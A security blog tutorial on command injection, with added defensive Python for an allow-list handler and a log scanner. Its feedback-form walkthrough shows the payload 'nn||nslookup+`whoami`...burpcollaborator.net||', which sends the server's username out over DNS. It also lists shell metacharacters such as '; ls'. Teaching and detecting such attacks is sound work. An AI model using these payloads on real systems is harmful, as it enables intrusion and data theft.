Exploiting Command Injection

With a real-world example:

Command injection is an injection vulnerability in which an attacker executes operating-system commands on the server by passing crafted input through the application's input fields. It occurs because the application passes unsanitized, untrusted input into a system command.

Consider an application that lets users run a few specific commands online, such as ping and traceroute. If the application neither sanitizes nor validates the input before passing it to the system command, an attacker can escalate their privileges by inserting malicious input into the application and perform unwanted actions.

Example: the application passes the value of the id parameter directly to the system command.

Now the attacker tampers with the value of the id parameter and supplies ; ls instead of the numeric value.

Note: any system command can be executed this way, such as pwd, whoami, etc.

In the response, we can see the output of the executed command. I used the ; metacharacter. Other metacharacters that can be used for command injection include ; , & , && , | , || , ` , () and #.

The vulnerability is not language-dependent: it can be found in any environment where the application passes user input directly into a system command without making it safe.
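The following Python snippet is an added example, not code from the original post or from any application it describes. It places the unsafe pattern described above (user input concatenated into a shell command line) beside the hardened form that the Remediation section below calls for: the command is looked up in an allow-list of the commands the business actually needs, the target is validated against a strict hostname pattern, and execution goes through an argv list so no shell ever parses the input. The ping/traceroute tool, its option flags and the hostname pattern are assumptions chosen for illustration.

```python
import re
import subprocess

# Allow-list of the only commands this (constructed) lookup tool is meant to expose,
# each with fixed options. Users pick a key; they never supply the program name.
ALLOWED_COMMANDS = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute", "-m", "5"],
}

# Hostname / IPv4 allow-list: dot-separated labels of letters, digits and hyphens.
# Spaces, ';', '|', '&', '`', '$', '(' and ')' cannot appear, so such input is
# rejected before anything reaches the operating system.
HOST_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*")


def vulnerable_command_line(target: str) -> str:
    """The unsafe pattern described above: user input concatenated into one string
    that is then handed to a shell (os.system(...) or subprocess.run(..., shell=True)).
    Returned rather than executed so the effect is visible without running anything."""
    return "ping -c 1 " + target


def safe_argv(command: str, target: str) -> list:
    """Hardened form: look the command up in the allow-list, validate the target
    against a strict pattern, and build an argv list so no shell ever parses it."""
    if command not in ALLOWED_COMMANDS:
        raise ValueError("command not permitted: %r" % command)
    if len(target) > 253 or not HOST_RE.fullmatch(target):
        raise ValueError("target rejected by hostname allow-list: %r" % target)
    return ALLOWED_COMMANDS[command] + [target]


def is_accepted(command: str, target: str) -> bool:
    """True when the hardened validation would let this request through."""
    try:
        safe_argv(command, target)
        return True
    except ValueError:
        return False


def run_safely(command: str, target: str, timeout: float = 10.0) -> str:
    """Execute only through an argv list (shell=False), with a timeout."""
    proc = subprocess.run(safe_argv(command, target), capture_output=True,
                          text=True, timeout=timeout, shell=False)
    return proc.stdout


if __name__ == "__main__":
    # Constructed inputs: two legitimate targets and two injection attempts.
    for target in ["example.com", "8.8.8.8", "8.8.8.8; ls", "`whoami`.collab-placeholder.invalid"]:
        print("shell would receive :", repr(vulnerable_command_line(target)))
        print("hardened handler    :",
              safe_argv("ping", target) if is_accepted("ping", target) else "rejected")
```

Note that the hardened handler does not try to strip or escape metacharacters; it rejects anything that is not a plausible hostname and never builds a shell string at all, which is what makes the ; , | and ` tricks from the section above inert.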

Working:

The attacker looks for an application that has command-execution functionality, then appends additional commands with the help of metacharacters and checks whether the response reflects the output of those additional commands.

· The attacker finds an input field through which a system command can be injected.

· The modified system command reaches the backend operating system. Because the input is not sanitized, the metacharacters are interpreted by the backend shell, and the attacker's own commands run on the server.

· As each injected command executes on the server, the attacker sees its output in the UI.

Exploitation:

The application has a feedback form through which users can submit feedback. The values submitted in the form are not sanitized in any way.

If we intercept the feedback-form request, we see a request of this type.

Our specific goal is to fetch the name of the currently logged-in user; in Linux this is easily done with the whoami command.

Because the command output is not shown in the application's response, we have to send it to a server that logs every request it receives.

To do that, I enter the payload below in the form fields and check for the result in the Burp Collaborator client.

nn||nslookup+`whoami`.eygwi47rzjzrnl0b229khkqif9lz9o.burpcollaborator.net||

nn = filler text for the textbox; it can be anything

nslookup = name server lookup

whoami = Linux command that prints the name of the current user; it is wrapped in the ` metacharacter so that its output is substituted into the command line

2ru5ecuswz35etelianpdx17uy0poe.burpcollaborator.net = Burp Collaborator address

+ = URL-encoded space, separating nslookup from its argument

. = joins the command output to the Burp Collaborator hostname, so the result arrives in the Collaborator client as a subdomain of the lookup

We also have to try the payload in each field of the feedback form to find out which parameter is vulnerable to command injection.

First I provided the payload in the name field.

It gave me a 400 error in the response, since the name cannot be longer than 64 characters, so I provided the same payload in the email field instead.

In the response I got 200 OK, so the request appears to have been accepted; now let's check whether anything arrived in our Burp Collaborator client.

Here you can see that we received several DNS requests, as expected since we used nslookup. In the description you can see that the name of the currently logged-in user has been appended as a subdomain.
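From the defender's side, the exploitation walk-through above is also a detection opportunity: the feedback form accepted a value full of shell metacharacters in the email field, and only a length limit (not validation) stopped the name field. The script below is an added example, not part of the original post, that scans constructed request-log lines for form-field values containing the metacharacters listed earlier. The simplified log format ("timestamp method path raw-form-body"), the sample lines and the collaborator placeholder hostname are assumptions made for this illustration; the payload string itself is the one from the post, with the collaborator host replaced.

```python
import re
from urllib.parse import parse_qs

# Shell metacharacters listed in the article, plus "$(" which opens a subshell.
METACHAR_RE = re.compile(r"\$\(|[;&|`()#]")

# Tokens that almost never appear in legitimate names or e-mail addresses and
# that directly chain or substitute commands in a POSIX shell.
HIGH_CONFIDENCE = {";", "|", "`", "$("}

# Simplified, constructed log format: "<timestamp> <method> <path> <raw form body>".
LINE_RE = re.compile(r"(\S+) (\S+) (\S+) (.*)")

# Constructed sample lines. Lines 2 and 3 replay the article's payload in the name
# and email fields (collaborator host replaced by a placeholder); line 4 is a
# legitimate name containing an ampersand, to show the false-positive case.
SAMPLE_LOG = """\
2020-10-01T10:00:00Z POST /feedback name=Alice&email=alice%40example.com&message=Great+site
2020-10-01T10:00:05Z POST /feedback name=nn%7C%7Cnslookup+%60whoami%60.collab-placeholder.invalid%7C%7C&email=a%40b.c&message=x
2020-10-01T10:00:09Z POST /feedback name=Bob&email=nn%7C%7Cnslookup+%60whoami%60.collab-placeholder.invalid%7C%7C&message=x
2020-10-01T10:00:12Z POST /feedback name=Carol+%26+Dave&email=carol%40example.com&message=Thanks
"""


def scan_log(text: str) -> list:
    """Decode each form body and report every field whose value contains a
    shell metacharacter, with a severity based on which tokens were seen."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, _method, path, body = m.groups()
        # parse_qs undoes the URL encoding (+ -> space, %7C -> |, %60 -> `),
        # so the check runs on what the backend would actually see.
        for field, values in parse_qs(body, keep_blank_values=True).items():
            for value in values:
                tokens = sorted(set(METACHAR_RE.findall(value)))
                if not tokens:
                    continue
                severity = "high" if HIGH_CONFIDENCE & set(tokens) else "low"
                findings.append({"time": ts, "path": path, "field": field,
                                 "value": value, "tokens": tokens, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["severity"].upper(), f["field"], f["tokens"], repr(f["value"]))
```

The "low" finding for "Carol & Dave" is deliberate: a single ampersand in a name is common, so a metacharacter match alone is a triage signal rather than proof of an attack, whereas backticks, pipes and "$(" in an e-mail field deserve immediate attention. Pairing these request-side hits with outbound DNS from the web server to unexpected domains is what confirms the out-of-band pattern shown above.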

Remediation

· Sanitize any input that is going to be passed into a system command.

· Whitelist only the input commands that are actually needed for the business requirements.

· Run servers with limited permissions and apply proper authorization on the servers.

· Perform source code reviews for system calls.

Written by

Security enthusiast working to secure web for others https://twitter.com/BoredSecEngg
